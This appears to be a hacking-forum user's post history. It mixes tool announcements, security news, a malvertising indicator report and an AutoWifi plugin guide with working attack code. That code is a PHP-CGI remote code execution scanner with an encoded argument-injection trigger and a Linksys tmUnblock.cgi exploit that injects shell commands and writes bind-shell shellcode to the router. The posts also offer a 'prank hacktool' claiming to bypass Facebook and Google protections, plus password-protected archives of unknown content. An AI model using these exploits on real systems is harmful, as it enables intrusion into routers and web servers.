Everything posted by Fi8sVrs (3206 posts, 87 days won)
-
http://uppit.com/mjedqwn66ag3/Entrepreneurs.rar Enjoy!
-
hydra 7 has protocol 3389
-
Text Tools:
All-in-One Notepad/Editor - An all-in-one notepad full of basic text manipulation tools.
Add Prefix/Suffix into Line - Insert a prefix and/or suffix into the content of each line.
Add/Remove Line Breaks - Add new line breaks and/or remove existing line breaks within your text's formatting.
Count Characters, Words, Lines - Count your text's characters, words, sentences, lines and word frequency.
Delimited Column Extractor - Extract a specific column of delimited text from each line of your input text.
Find and Replace Text - Find and replace text matching your search criteria.
Find and Affix Text - Find and affix text with a prefix and/or suffix.
Letter Case Converter - Convert your text's letter case to UPPER, lower, RaNdOM and more.
Merge Text (Line by Line) - Merge two sets of text line by line with the option of writing a prefix, divider or suffix into each merged line.
Remove Duplicate Lines - Remove/delete all duplicate lines within your text/list.
Remove Empty Lines - Remove/delete all empty lines within your text/list.
Remove Extra Spaces - Remove leading/trailing/extra/all whitespace from your text.
Remove Letter Accents - Remove common letter accents from your text (e.g. à will convert into a).
Remove Lines Containing... - Remove lines containing or not containing your specified search text.
Sort Text Lines - Sort your text's lines in alphabetical, length, random or reverse order.

Obfuscation Tools:
ASCII, Hex, Unicode, Base64, Binary, Octal Converter - Encode/decode ASCII, hex, unicode, base64, binary, octal.
Binary Code Translator - Obfuscate text by encoding it into the 0s and 1s of binary code. Very geeky!
Disemvowel Tool - Remove vowels "aeiou" or any other set of letters from text.
Encryption Generator - Encrypt/decrypt text via password using Tiny Encryption Algorithm (TEA) and base64.
Reverse Text Generator - Reverse text, flip text, reverse wording, flip wording, reverse each word's lettering, flip letters upside down.
ROT13 Caesar Cipher - Encrypt plaintext into ROT13 ciphertext or decrypt ROT13 ciphertext into plaintext.
Word Scrambler/Unscrambler - Scramble/unscramble each word's lettering within a body of text.

Randomization Tools:
Random Line Picker - Pick random lines from your input text/list. Lines can contain names, numbers, etc.
Random Number Generator - Generate random numbers from your entered low/high range with prefix, suffix and delimiter options.
Random String Generator - Generate random text string(s) from your entered input elements such as characters, words, sentences, etc.
String Randomizer - Randomize text strings with the option of a delimiter.

Combination / Permutation Tools:
Combination Generator - Make combinations from text.
Line Combination Generator - Make combinations from lines of text.
Permutation Generator - Make permutations from text (letters, numbers, symbols, words, sentences, etc.).

Numeration Tools:
Generate List of Numbers - Generate a list of sequential numbers from your selected low/high number range.
Number Each Line - Add a sequential number to each line of text. Enumerate items within a list.
Online Tally Counter - Count using multiple, independently named tallies which are recorded into a printable list.
Split List into Sublists - Split a list into sublists using your entered sublist amount and divider text.

Math Tools:
Add a List of Numbers - Total a list of numbers.

Timing Tools:
Online Countdown Timer - Set a time and count down its duration. A progress bar and blinking alarm warn when time has ended.
Online Stopwatch - A precision online stopwatch that records start/split/stop times into a timer log.

Image Tools:
Image to Base64 Converter - Convert an image into a base64 encoded data URL which will load/display as an img-src.
QR Code Generator - Privately* generate QR Codes using javascript and HTML5. *No PHP server calls!

Big File Tools:
Count Text - Count characters, words, sentences and lines within a large text file.
Join Text Files - Join text files "Line over Line" or "Line by Line" with prefix/delimiter/suffix options.
Prefix/Suffix Lines - Add a prefix and/or suffix into each line of a large text file.
Random Line Picker - Pick random lines from a large text file.
Remove Duplicate Lines - Remove duplicate lines from a large text file.
Remove Empty Lines - Remove empty lines from a large text file.
Remove Extra Spaces - Remove leading/trailing/extra/all whitespace from a large text file.
Remove Lines Containing... - Remove lines containing or not containing specified text from a large text file.
Replace Text - Find and replace text in a large text file.
Sort Lines - Sort the lines of a large text file.
Unix/Dos Format Converter - Convert those little Unix squares into proper Notepad line breaks.

onSelect Tools:
Change Letter Case onSelect - Instantly change the letter case of text selected via your mouse.
Convert into Unicode onSelect - Convert selected text into HTML-ready unicode.
Delete Text onSelect - Instantly delete text selected via your mouse.
Insert Text onClick - Instantly insert text at the point clicked with your mouse.
Prefix/Suffix Text onSelect - Append selected text with a prefix and/or suffix.
Replace Text onSelect - Replace selected text with your entered replacement text.

Miscellaneous Tools:
Keyword Phrase Generator - Enter seed text to generate keyword phrases.

Text Mechanic - Text Manipulation Tools
-
APP for pranking mobile phones - Mobile Prank 2 Hacktool
Download: Multiupload.nl - upload your files to multiple file hosting sites!
Pass: protected

Update Log:
Added SMSGlobal with 25 Free SMS/MMS
Added Cartao Dieta
Added You Win
Added Inquerito Restauracao
Added Clube Blinko
Added Free SMS 2
Added Free SMS 3
Added Free SMS 4
Added OnVerify.com
Added PhoneConfirmation.com
Added PT Cliente Prank
Added SMSGlobal Prank
Added Cryptomathic Web Bank (Mobile Phone SMS)
Added CertifiCall.net (Uses Voice Recognition and user must say "I Agree")
Updated Webcare Byside
Added Securitas Direct Prank
Removed IMDB.com | Reason: No longer available
Added TOP Ringtones
Added Descarregar Agora
Added CellDorado
Added iPad Vs Galaxy Tab 2
Added iPhone 5
Added Bala Gana
Added Gomobbi Download Now
Bypassed Facebook Mobile Protection
Bypassed Youtube
Bypassed Google Account
Bypassed Google Account 2
Bypassed Microsoft Live

Last version: http://uppit.com/e9xdmhayp1rh/Mobile_Prank_3.rar
Old version: http://uppit.com/d0qwrhi6tvb3/Mobile+Prank+2+Hacktool+(Protected).rar
-
wrong category edit// and western
-
Junkware Removal Tool is a security utility that searches for and removes common adware, toolbars, and potentially unwanted programs (PUPs) from your computer. A common tactic among freeware publishers is to offer their products for free, but bundle them with PUPs in order to earn revenue. This tool will help you remove these types of programs.
Download
Virustotal
SHA256: 87b361ebba82c57d7851131c3586ee27620484ff22186c12ebefe377c7ecded2
File name: JRT.exe
Detection ratio: 0 / 50
Analysis date: 2014-02-19 09:53:49 UTC
Anubis
-
AutoWifi is an application which tries to log in automatically on wifi hotspots with web-based authentication. This app stays in the systray, and processes the secure login when a SSID is matched by AutoWifi. The goal is to remove the hassle of doing web-based authentication for these kinds of free hotspots, letting you surf as if you were on your LAN.
AutoWifi is a Linux app, and it will never be released for other platforms. It's a pygtk application, and it's released under the GPL2 terms.
Support for free hotspots (through SSL, and server certificate validation): FreeWifi, FON, Neuf ...
It's an alpha release, but it works for me (for freewifi, neuf, and fon spots). AutoWifi doesn't provide accounts for these free hotspots ;-). The first time you meet a SSID known by AutoWifi, it will prompt you to enter your account, if needed, through a GUI. Account information is saved according to the XDG freedesktop specs (in file ~/.config/autowifi/autowifi.conf). To modify your account, just edit this file.

States: the AutoWifi icon in your systray can take 3 forms:
Icon 1: AutoWifi is running, but no known Wifi/SSID is matched.
Icon 2: A matched SSID is properly authenticated. AutoWifi will try to keep the connection on, by fetching it every 60 seconds.
Icon 3: A matched SSID is not properly authenticated. Put your mouse on the icon, to show the tooltip, to get more info about the trouble. In this state, AutoWifi will try every 5 seconds to re-authenticate.

Todo:
support for McDonald's hotspots
use desktopcouch instead of xdg config (?)
ensure rock solid

How it's working (for developers)
AutoWifi uses the dbus of networkmanager to be aware of SSID changes. When a new SSID is set, AutoWifi will match the new SSID against its list of known plugins (through a regex on the SSID). If it finds one, it will run it, to process the form authentication with python-twill.
AutoWifi uses a home-made plugin system. Plugins are easy to implement (see the _virgin.py one). Plugins are located in /usr/share/autowifi/plugins (for the main plugins) or in your home directory (in ~/.config/autowifi/plugins), for your local plugins. A plugin is a python file (which doesn't start with an underscore), which should contain a Wifi class. Here is a real example:

    from twill.commands import *

    class Wifi(object):
        match = "freewifi"   # regex re.I !

        def __init__(self):
            pass

        def connectWithAuthent(self, login, passwd):
            go("http://test-debit.free.fr/")
            if "Pour vous connecter au service FreeWiFi" in show():
                formclear("1")
                fv("1", "login", login)
                fv("1", "password", passwd)
                submit()
                if "CONNEXION AU SERVICE REUSSIE" in show():
                    return True    # authent reached
                else:
                    return False   # authent failed
            else:
                return True        # already authentified !

Notes:
The match attribute defines the regular expression to match the current SSID. It's case insensitive, and really needed ;-)
A plugin should have a connect() or a connectWithAuthent() method, but not both! These methods should return a boolean (True = authentication granted / False = authentication failed), or an error string (for other reasons).
A plugin can use the python twill commands to mechanize the HTTP process.
The easiest way to start hacking is to duplicate the _virgin.py template (in ~/.config/autowifi/plugins). If you develop a plugin which could be interesting for the community, feel free to send it to me, and I will package it in a future release.

Installation
IMPORTANT: my PPA is not up-to-date (due to quickly/launchpad trouble); you will find the latest releases here.
AutoWifi is available in manatlan's ppa:
    sudo add-apt-repository ppa:manatlan/ppa
    sudo apt-get update
    sudo apt-get install autowifi
The repository is here:
    deb http://ppa.launchpad.net/manatlan/ppa/ubuntu lucid main
    deb-src http://ppa.launchpad.net/manatlan/ppa/ubuntu lucid main
Source Repository: Available on launchpad (manatlan2) autowifi
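The SSID-matching and plugin-dispatch contract described above (regex match on the SSID, case-insensitive; connect() or connectWithAuthent() but not both; a boolean or an error string as result; 60 s re-fetch when authenticated, 5 s retry otherwise), as an added example that is not AutoWifi's own code. The plugin classes are constructed stand-ins: no twill, dbus or NetworkManager calls are made.

```python
import re

# Poll cadence from the post's "States" section: an authenticated SSID is
# re-fetched every 60 seconds, a failed one is retried every 5 seconds.
POLL_OK_SECONDS, POLL_RETRY_SECONDS = 60, 5


class FreeWifiPlugin(object):
    """Constructed stand-in for the freewifi plugin shown above: no twill
    calls, it succeeds when both credentials are present."""
    match = "freewifi"   # regex, matched with re.I

    def connectWithAuthent(self, login, passwd):
        if not login or not passwd:
            return "no account configured"   # error string, not a boolean
        return True


class FonPlugin(object):
    """Constructed: a hotspot that needs no form login."""
    match = r"^fon"

    def connect(self):
        return True


class BrokenPlugin(object):
    """Constructed: breaks the rule that a plugin has connect() or
    connectWithAuthent(), but not both."""
    match = "broken"

    def connect(self):
        return True

    def connectWithAuthent(self, login, passwd):
        return True


def plugin_is_valid(cls):
    """Exactly one of connect()/connectWithAuthent() must be defined."""
    return hasattr(cls, "connect") != hasattr(cls, "connectWithAuthent")


def find_plugin(ssid, plugins):
    """First plugin whose match regex hits the SSID, case-insensitively."""
    for cls in plugins:
        if re.search(cls.match, ssid, re.IGNORECASE):
            return cls
    return None


def run_plugin(cls, login=None, passwd=None):
    """Dispatch on the plugin contract and map the result to (state, next_poll)."""
    if not plugin_is_valid(cls):
        raise ValueError("%s must define connect() or connectWithAuthent(), not both"
                         % cls.__name__)
    plugin = cls()
    if hasattr(plugin, "connectWithAuthent"):
        result = plugin.connectWithAuthent(login, passwd)
    else:
        result = plugin.connect()
    if result is True:
        return "authenticated", POLL_OK_SECONDS
    if result is False:
        return "failed", POLL_RETRY_SECONDS
    return str(result), POLL_RETRY_SECONDS   # error string for other reasons


def handle_ssid(ssid, plugins, login=None, passwd=None):
    """What the daemon does when NetworkManager reports a new SSID."""
    cls = find_plugin(ssid, plugins)
    if cls is None:
        return "no known ssid", None
    return run_plugin(cls, login, passwd)


PLUGINS = [FreeWifiPlugin, FonPlugin, BrokenPlugin]

if __name__ == "__main__":
    for ssid in ("FreeWifi", "FON_FREE_INTERNET", "HomeNet"):
        print(ssid, handle_ssid(ssid, PLUGINS, "user", "secret"))
```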
-
Description
Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
Features
It creates a directory with all the information, including nmap output files.
It uses colors to remark important information on the console.
It detects some security problems like host name problems, unusual port numbers and zone transfers.
It is heavily tested and it is very robust against DNS configuration problems.
It uses nmap for active host detection, port scanning and version information (including nmap scripts).
It searches for SPF records information to find new hostnames or IP addresses.
It searches for reverse DNS names and compares them to the hostname.
It prints out the country of every IP address.
It creates a PDF file with results.
It automatically detects and analyzes sub-domains!
It searches for domain emails.
It checks the 192 most common hostnames in the DNS servers.
It checks for Zone Transfer on every DNS server.
It finds the reverse names of the /24 network range of every IP address.
It finds active hosts using nmap's complete set of techniques.
It scans ports using nmap.
It searches for host and port information using nmap.
It automatically detects web servers used.
It crawls every web server page using our Web Crawler Security Tool.
It filters out hostnames based on their name.
It pseudo-randomly searches N domains in google and automatically analyzes them!
Use CTRL-C to stop the current analysis stage and continue working.
Download
-
Reverse Code Engineering VMWare Image

It includes about 300+ tools/programs, around 800 - 1500 MB in size. Some are still zip/rar or 7z compressed. Here a collection of unpackers, debuggers, patchers, etc.: http://www.exetools.com/unpackers.htm

Windows XP PRO SP3 PE (x86)
Size: 1.73GB compressed (uncompressed size is 3.43GB)
SHA1 part 1: 8bb20534ab2df28eefe4003364f09e4c522b06b3
SHA1 part 2: 48f96ba87ae11e2f3d70a248d841bf94ac460243
VMWare compatibility: Workstation 9.0 (ESX Server)
Image version: 1.1
Updates, additions or improvements on content and/or settings:
IDA 6.1 x86 & x64 added
Newest upx added
A few setup unpackers added
100+ Ollydbg plugins added
Explorer on default location again (not on top anymore) changed
IE 8, Flash, Adobe reader added (latest versions as of today)
Tutorial/paper database updated
VMware RAM increased from 512mb to 1024mb changed

Windows 7 ULT SP1 PE (x86)
Size: 2.21GB compressed (uncompressed size is 4.70GB)
SHA1 part1: c3d6b3e04007b364eef67fdbdfbd4ca26d8a5d9a
SHA1 part2: 2127b19c483b0964347d9d97809ff1828787ba76
SHA1 part3: 8f288f1a3ffe5f7aad62077ab710d422a30bf3d0
VMWare compatibility: Workstation 6.5-7.x (ESX Server)
Image version: 1.2
Updates, additions or improvements on content and/or settings: Nothing yet

Download links
XP 08y426QEAG^$#P'[s[2.m=-1@396ED$jdh23818jDh]]\'a[03lfds.z.042942
https://drive.google.com/file/d/0B9CSGyTrkEvqVUpEUnhxcU1XbGc/
Win7 =2345-;JADk45)l435.[\.fsxFDS423]\213053&&^523$@#%dgshJFD7757239
https://drive.google.com/file/d/0B9CSGyTrkEvqR3B3OUJQUGZMUUE/

Warning: The VMWare image is configured to work only on a local network (host-only). It is not connected to the internet (NAT shared), because it is impossible for me to check and know if all those programs and tools are clean. Most of them, 80%, came from a trusted source, but a lot came from an unknown, probably (not totally sure) un-trusted source. So please, I repeat please, if you use NAT make sure to install a proxy server or VPN in it first!
I have not yet installed anything in it, besides programs and tools that I trust. The image is clean as it is now. Please make use of snapshots so if something goes wrong you can revert back to the beginning (original state).

Credits:
x58 for cooking it up together
Microsoft Windows XP Pro PE -> By tj007s13
Microsoft Windows 7 Ultimate x86 Lite v3 -> By nileshtambe
HackHound wallpaper by ka0z
All other credits to their respective owners, e.g. all tools and software that is included. If I forgot to add credits please pm me and I'll add them.

F.A.Q.
Q: Does this have warranties and support etc?
A: No, it does not come with ANY warranties. I will only continue to update those images and fix issues and/or add new software. Nothing else.
Q: How can I run this image on other virtualization software like M$ Virtual PC, VirtualBox etc?
A: Yes it will work, please click on the following links for more information: VirtualBox, Virtual PC, QEMU
Q: Do I have the right to share this elsewhere? Like on another forum or website.
A: No you don't, unless you host the image yourself and give proper credits.
Q: Will you ever make an x64 version of those images?
A: Maybe I will in the future when I am in the mood for it.
Q: I am a beginner, where do I have to start?
A: I have added some tutorials and useful websites; you can go to tuts4you and learn some basics about the subject and start with it.
Q: Do I have to buy VMware or where can I download VMware 9.x Workstation?
A: No you don't have to; you can use VMware Player (free) or download this at your own risk, I'm not responsible (possibly not legally allowed in your country): link
Q: Where can I find a complete list of all the tools installed in those images?
A: Simply not, because I'm too lazy to make one; just download it and see for yourself. All the useful and most popular programs and tools are included.
Q: Do you accept donations?
A: Yes, only bitcoins. Address: 1CqpKC2isSPhreTquY7ekoYgzVhNn5fTXH
Q: Can I be a mirror (hoster) for your VMware images?
A: Yes that is possible, just shoot me a pm.

RCE VMWave image for HackHound - Virtual Environment - HackHound
-
After a week in which we were bombarded with hundreds of clones, no exaggeration, of the game Flappy Bird, Apple and Google have decided to stop accepting such Flappy apps. Flappy Bird may earn itself an episode in the history of mobile gaming for the fuss of the past few weeks. After its independent developer, a Vietnamese named Dong Nguyen, had come to earn 50,000 dollars a week from in-game ads, he decided to take it down. Because its recipe was not complicated at all, many other developers were convinced they could take advantage of the moment to get rich with various Flappy Bird clones using similar names. Some of them even succeeded, considering that they released Flappy malware apps on Google Play that sent premium-rate messages without the user's consent. Because the trend of these Flappy apps had become annoying and a great many programs released in this period ended up including the term Flappy in an almost unjustified way, Apple and Google took a radical decision. For the first time in the history of the most popular mobile app stores, the creators of the Apple AppStore and Google Play will no longer accept apps that have the word Flappy in the title, on the grounds that they "try to take advantage of a popular app". This decision was not communicated officially but has been observed by several users. Among them is Ken Carpenter of the studio Mind Juice Media, whose game Flappy Dragon was rejected almost simultaneously by Apple and Google for the same reason stated above. Although the solution is as simple as can be, renaming those programs, several developers have taken to social networks in recent days to voice their frustration over this decision. Although this does not mean that, through a purge, all Flappy Bird clones will be removed from the two app stores, what matters is that some measures have been set to reduce users' confusion about Flappy apps. Via
-
Whitepaper called Nazca: Detecting Malware Distribution in Large-Scale Networks. In this paper, they study how clients in real-world networks download and install malware, and present Nazca, a system that detects infections in large scale networks. Nazca does not operate on individual connections, nor look at properties of the downloaded programs or the reputation of the servers hosting them. Instead, it looks at the telltale signs of the malicious network infrastructures that orchestrate these malware installations, which become apparent when looking at the collective traffic produced by many users in a large network. Being content agnostic, Nazca does not suffer from coverage gaps in reputation databases (blacklists), and is not susceptible to code obfuscation. They have run Nazca on seven days of traffic from a large Internet Service Provider, where it has detected previously-unseen malware with very low false positive rates. Download Mirror
-
This package allows you to search for snippets from the cloud and inserts them into your code without leaving Visual Studio. The Bing Code Search add-in for Visual Studio 2013 makes it easier for .NET developers to search for and reuse code samples from across the coding community, including MSDN, StackOverflow, Dotnetperls and CSharp411. Bing Code Search improves developer productivity and speed by bringing the experience of searching for reusable C# code into the Visual Studio IDE. Check out this demo video for more info.
Download v1.0 UPDATED 2/17/2014
Bing Code Search for C# extension
-
This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, including "apache magica" and plesk paths, along with other misconfigurations.

    #!/usr/bin/python2
    # Written for /r/netsec
    # test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
    # infodox - insecurety.net - 2013
    # Twitter: @Info_dox
    # Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
    # released under WTFPL
    import requests
    import sys

    def scan(target):
        paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi',
                 '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
        for path in paths:
            probe(target, path)

    def probe(target, path):
        print "[*] Testing Path: %s" %(path)
        trigger = path + "/?"
        trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
        trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
        trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
        trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
        trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
        trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
        trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
        trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
        trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
        trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
        trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
        trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
        trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
        url = target + trigger
        php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        try:
            haxor = requests.post(url, php)
            if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
                print "Exploitable!"
        except Exception:
            print "Err, Someshit broke"

    def main(args):
        if len(sys.argv) != 2:
            print "Usage: %s <target>" %(sys.argv[0])
            print "Eg: %s http://lol.com" %(sys.argv[0])
            sys.exit(0)
        target = sys.argv[1]
        print "[*] Target is: %s" %(target)
        scan(target)

    if __name__ == "__main__":
        main(sys.argv)
    #_EOF infodox 2013

PHP-CGI Remote Code Execution Scanner - Packet Storm
-
Hold Security reported it has discovered a list of credentials for close to 7,800 FTP servers being circulated in cybercrime forums in the Deep Web. FTP servers are considered a privileged target for cyber criminals; hackers can exploit them, for example, to spread malware by infecting webservers that rely on FTP applications for updates. The Hold Security firm has recently reported that its experts have discovered thousands of FTP sites infected by malware; the company has found in the underground a list of credentials for nearly 7,800 FTP websites. During their DeepWeb Monitoring activity the experts found the precious list, which includes high-profile targets: a collection of poorly protected FTP servers that were victims of botnets or other infections that stole the FTP credentials. The New York Times and UNICEF were among the high-profile victims according to PC World; both have been notified. As confirmed by the founder and chief information security officer Alex Holden, the scale and extent of the attacks that compromised the FTP servers are unclear; from the analysis of signatures the security experts identified many similarities between the attacks. Holden identified the two following attack vectors:
The hackers upload malicious PHP scripts to the FTP servers; if the FTP servers have some link to a webserver where they are used to upload content, the attackers have reached their intent.
The hackers upload HTML files onto the FTP servers; if victims navigate the file list on an FTP app or server using their browser, they are hijacked to a malicious website controlled by cybercriminals.
The attackers use social engineering tricks to deceive victims; the files in fact have innocuous names such as Pinterest, AOL, or something related to the victim’s company. In the typical attack scenarios, victims are redirected to malicious sites proposing prescription medication, pornography or even websites serving ransomware.
“This is why we think it may be more than one group,” Holden said. “There are different schemes going on.” It is suggested that organizations assess their FTP servers and improve their security. Via
-
SlickLogin showcased its technology at the TechCrunch Disrupt event last year

Google has acquired SlickLogin - an Israeli start-up behind the technology that allows websites to verify a user's identity by using sound waves. It works by playing a uniquely generated, nearly-silent sound through computer speakers, which is picked up by an app on the user's smartphone. The app analyses the sound and sends a signal back to confirm the identity. The technology can be used either as a replacement for a password or as an additional security layer. SlickLogin confirmed the acquisition on its website but did not provide any financial details of the deal.
"Today we're announcing that the SlickLogin team is joining Google, a company that shares our core beliefs that logging in should be easy instead of frustrating, and authentication should be effective without getting in the way," the firm said in a statement. "Google was the first company to offer two-step verification to everyone, for free - and they're working on some great ideas that will make the internet safer for everyone."

Secure logins
Many firms, especially those in sectors such as financial services, have been adopting a two-step verification for users. The steps include matching the user name and the password plus a second layer of verification. In some cases, such as online payments, companies message the user a one-time Pin on the mobile phone number associated with their account. The user then enters the Pin within a stipulated period of time to verify his or her identity. Some other companies, like banks, issue special gadgets that generate unique codes. Users need to enter these codes to authenticate their login.
Analysts said that while these methods have been working, firms were keen to use even more secure ways to protect their users against any data theft. "The more uniquely a technology identifies the user, the safer the system would be against any potential hacks," Sharat Sinha, a vice president with Palo Alto Networks, a firm specialising in enterprise security, told the BBC. "The problem with one-time Pins is that if someone hacks into your account, they can change the mobile number associated with it. "Meanwhile, specialised hardware devices provided to users are something they need to carry with them all the time," he said. Mr Sinha added that firms were looking for technology that is not only unique and highly secure, but also convenient to use. "And anything that uses smartphones makes life easier for the users." Via
-
DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure

Today, at 2014-02-12 12:16:20 (CET), we became aware of a possible evasive/beneath the radar malvertising based g01pack exploit kit attack, taking place through the DoubleClick ad network using an advertisement featured at About.com. Investigating further, we were able to identify the actual domains/IPs involved in the campaign, and perhaps most interestingly, managed to establish a rather interesting connection between the name servers of one of the domains involved in the attacks, and what appears to be a fully operational and running Ukrainian-based ad platform, Epom in this particular case.

Actual URL: hxxp://ad.doubleclick.net/N479/adi/abt.education/education_biology;p=1;svc=;site=biology;t=0;bt=9;bts=0;pc=4;oe=iso-8859-1;auc=1;fd=2;fs=1;sp2=0;go=9;a=;kw=;chan=education;syn=about;tile=1;r=1;dcopt=ist;sz=728×90;u=DBIIS70bOkWAXwch41309;dc_ref=http:/biology.about.com/library/glossary/bldefmenlawia.htm;ord=1DBIIS70bOkWAXwch41309

Malvertising domains/URLs/IPs involved in the campaign:
adservinghost1.com – 212.124.112.232; 212.124.112.226 (known to have responded to the same IP is also cpmservice1.com); 212.124.112.229; 74.50.103.41; 68.233.228.236
ad.onlineadserv.com – 37.59.15.44; 37.59.15.211
hxxp://188.138.90.222/ad.php?id=31984&cuid=55093&vf=240

IP reconnaissance: 188.138.90.222 – The following domains are also known to have responded to the same IP: rimwaserver.com; notslead.com; adwenia.com – Email: philip.woronoff@yandex.ru (also known to have responded to 188.138.74.38 in the past; as well as digenmedia.com)

Based on BrightCloud’s database, not only is adservinghost1.com already flagged as malicious, but also, we’re aware that MD5: dc35b211b5eb5bd8af02c412e411d40e (Rogue:Win32/Winwebsec) is known to have phoned back to the same IP as the actual domain, hxxp://212.124.112.232/cb_soft.php?q=dcee08c46ea4d86769a92ab67ff5aafa in particular.

Here comes the interesting part. Apparently, the name servers of adservinghost1.com are currently responding to the same IPs as the name servers of the Epom ad platform.
NS1.ADSERVINGHOST1.COM – 212.124.126.2
NS2.ADSERVINGHOST1.COM – 74.50.103.38

The following domains are also currently responding to 212.124.126.2, further confirming the connection: ns1.epom.com; ads.epom.com; api.epom.com; directads.epom.com; ns1.adshost1.com; ns1.adshost2.com; ns1.adshost3.com

The following domains are also responding to the same IP as the Epom.com domain at 198.178.124.5: automob.com; autos.net.ua; epom.com; formanka-masova.cz; ipfire.com – Email: kaandvc@gmail.com; Email: satilikdomain@live.com; smartkevin.com

We’ll be keeping an eye on this beneath the radar malvertising infrastructure, and post updates as soon as new developments emerge.
Via DoubleClick malvertising campaign exposes long-run beneath the radar malvertising infrastructure Webroot Threat Blog
-
DB-ID: 31683
CVE: N/A
OSVDB-ID: N/A
Author: Rew
Published: 2014-02-16
Verified: Verified
Vulnerable App: N/A

Exploit for 0day Linksys unauthenticated remote code execution vulnerability. As exploited by TheMoon worm; discovered in the wild on Feb 13, 2013 by Johannes Ullrich.

I was hoping this would stay under wraps until a firmware patch could be released, but it appears the cat is out of the bag... That new Linksys worm... : netsec

Since it's now public, here's my take on it. Exploit written by Rew. (Yes I know, everyone hates PHP. Deal with it.)

Currently only working over the LAN. I think there may be an iptables issue or something. Left as an exercise to the reader.

Based on "strings" output on TheMoon worm binary, the following devices may be vulnerable. This list may not be accurate and/or complete!!!

E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300
WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N

#!/usr/bin/php
<?php
error_reporting(0);

$host = "192.168.1.1";     // target host
$port = "8080";            // target port
$vuln = "tmUnblock.cgi";   // hndUnblock.cgi works too

// msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X
$shellcode = base64_decode(
    "f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA".
    "AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA".
    "AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV".
    "BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/".
    "ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ".
    "FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI".
    "EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw".
    "8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB".
    "UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P".
    "+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp".
    "bi9zaA=="
);

// regular urlencode() doesn't do enough.
// it will break the exploit. so we use this
function full_urlencode($string) {
    $ret = "";
    for($c=0; $c<strlen($string); $c++) {
        if($string[$c] != '&')
            // always two hex digits, so bytes below 0x10 stay valid
            $ret .= sprintf("%%%02x", ord($string[$c]));
        else
            $ret .= "&";
    }
    return $ret;
}

// wget is kind of a bad solution, because it requires
// the payload be accessible via port 80 on the attacker's
// machine. a better solution is to manually write the
// executable payload onto the filesystem with echo -en
// unfortunately the httpd will crash with long strings,
// so we do it in stages.
function build_payload($host, $port, $vuln, $shellcode) {
    // in case we previously had a failed attempt
    // meh, it can happen
    echo "\tCleaning up... ";
    $cleanup = build_packet($host, $port, $vuln, "rm /tmp/c0d3z");
    if(!send_packet($host, $port, $cleanup)) die("fail\n");
    else echo "done!\n";

    // write the payload in 20byte stages
    for($i=0; $i<strlen($shellcode); $i+=20) {
        echo "\tSending ".$i."/".strlen($shellcode)." bytes... ";
        $cmd = "echo -en '";
        for($c=$i; $c<$i+20 && $c<strlen($shellcode); $c++) {
            $cmd .= "\\0".decoct(ord($shellcode[$c]));
        }
        $cmd .= "' >> /tmp/c0d3z";
        $cmd = build_packet($host, $port, $vuln, $cmd);
        if(!send_packet($host, $port, $cmd)) die("fail\n");
        else echo "sent!\n";
        usleep(100000);
    }

    // make it usable
    echo "\tConfiguring... ";
    $config = build_packet($host, $port, $vuln, "chmod a+rwx /tmp/c0d3z");
    if(!send_packet($host, $port, $config)) die("fail\n");
    else echo "done!\n";
}

// add in all the HTTP shit
function build_packet($host, $port, $vuln, $payload) {
    $exploit = full_urlencode(
        "submit_button=&".
        "change_action=&".
        "submit_type=&".
        "action=&".
        "commit=0&".
        "ttcp_num=2&".
        "ttcp_size=2&".
        "ttcp_ip=-h `".$payload."`&".
        "StartEPI=1"
    );
    $packet = "POST /".$vuln." HTTP/1.1\r\n".
        "Host: ".$host."\r\n".
        // this username:password is never checked
        "Authorization: Basic ".base64_encode("admin:ThisCanBeAnything")."\r\n".
        "Content-Type: application/x-www-form-urlencoded\r\n".
        "Content-Length: ".strlen($exploit)."\r\n".
        "\r\n".
        $exploit;
    return $packet;
}

function send_packet($host, $port, $packet) {
    $socket = fsockopen($host, $port, $errno, $errstr);
    if(!$socket) return false;
    if(!fwrite($socket, $packet)) return false;
    fclose($socket);
    return true;
}

echo "Testing connection to target... ";
$socket = fsockopen($host, $port, $errno, $errstr, 30);
if(!$socket) die("fail\n");
else echo "connected!\n";
fclose($socket);

echo "Sending payload... \n";
